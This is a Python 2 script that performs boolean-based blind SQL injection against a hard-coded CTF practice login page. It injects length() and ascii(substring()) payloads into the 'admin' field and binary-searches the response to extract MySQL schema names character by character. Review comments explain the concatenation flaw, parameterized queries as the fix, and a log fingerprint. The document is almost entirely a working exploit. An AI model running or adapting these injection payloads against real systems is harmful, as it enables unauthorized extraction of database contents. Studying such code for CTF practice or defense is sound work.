python mysql盲注小程序

# -*- coding: gbk -*-
"""Boolean-based blind SQL injection probe for a CTF practice endpoint (Python 2).

The script sends GET requests to the login handler hard-coded below, placing a
SQL fragment in the ``admin`` parameter. The only feedback it uses is whether
the response body contains the text ``数据库连接失败`` ("database connection
failed"): when that text is absent the injected condition is treated as true.
With that one-bit oracle it first finds the length of the value selected by
``sqlcomm`` and then recovers it one character at a time by binary search over
ASCII codes 0..140.

Defender's view: the vulnerability exploited is string concatenation of the
``admin`` field into a SQL statement; prepared statements / parameterized
queries make the injected quote inert. In server logs this traffic shows up as
many sequential login requests whose ``admin`` parameter contains
``length(`` / ``ascii(substring(`` fragments, all carrying the same malformed
User-Agent string (it lacks its closing parenthesis).
"""
import urllib2
import urllib

# Subquery whose single-row result is extracted character by character.
# ``limit 1,1`` selects the second row of information_schema.SCHEMATA.
sqlcomm="(SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1)"

# Form fields sent on every request. The initial "admin" value is never sent:
# both getlength() and sendhttp() overwrite data["admin"] before encoding the
# query string. "pass" and "action" presumably mirror the real login form.
data = {
        "admin":"admin' and (ascii(substring(version(),1,1))=0) #",
        "pass":"f",
        "action":"login"
}


def getlength():
    """Return the length of the ``sqlcomm`` result, or False if none of 0..999 matches.

    Each candidate length is tested with one request. The trailing
    ``&pass=f&action=login`` text lives inside the ``admin`` value, so
    urllib.urlencode escapes it and it is transmitted as part of that value,
    not as additional parameters. The matching length is printed and returned.
    """
    for counti in range(1000):
        data["admin"]="admin' and length(%s)=%s #&pass=f&action=login" % (sqlcomm,str(counti))
        urldata=urllib.urlencode(data)
        url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata
        # Fixed, malformed User-Agent (no closing parenthesis) -- an easy
        # fingerprint for this script in access logs.
        headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
        req = urllib2.Request(url,headers=headers)
        resul=urllib2.urlopen(req).read()
        # The page is served in GBK; decode so the Chinese marker below matches.
        resulstr=resul.decode('gbk')
        if resulstr.find(u'数据库连接失败')==-1:
            # Oracle: the failure text is absent, so the condition held.
            print counti
            return counti
    return False


def sendhttp(countn,sign,num):
    """Send one probe comparing character ``countn`` of ``sqlcomm`` with ``sign``.

    Returns True when the response lacks the failure marker, i.e. when
    ``ascii(substring(sqlcomm, countn, 1)) <sign> middle`` held.

    NOTE(review): ``num`` is never used; the comparison value is read from the
    module-level ``middle`` assigned in the loop at the bottom of the file.
    Both the callers below pass the same value as ``num``, so behaviour is
    unchanged, but the function only works when called from that loop.
    """
    data["admin"]="admin' and (ascii(substring(%s,%s,1))%s%s) #" % (sqlcomm,str(countn),sign,str(middle))
    urldata=urllib.urlencode(data)
    url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata
    headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
    req = urllib2.Request(url,headers=headers)
    resul=urllib2.urlopen(req).read()
    resulstr=resul.decode('gbk')
    if resulstr.find(u'数据库连接失败')==-1:
        return True
    return False


# Driver: find the length, then binary-search each character position.
# If getlength() returns False, ``False + 1 == 1`` and the range is empty,
# so the script silently prints nothing rather than failing.
coutnum= getlength()
for j in range(1,coutnum+1):
    # ``min``/``max`` shadow the Python builtins; they are the search bounds.
    min,max=0,140
    while min<=max:
        middle=(max+min)//2
        if sendhttp(j,"=",middle):
            # Trailing comma: Python 2 print without a newline, so the
            # recovered characters appear on one line.
            print chr(middle),
            break
        if sendhttp(j,">",middle):
            min=middle+1
        else:
            max=middle-1
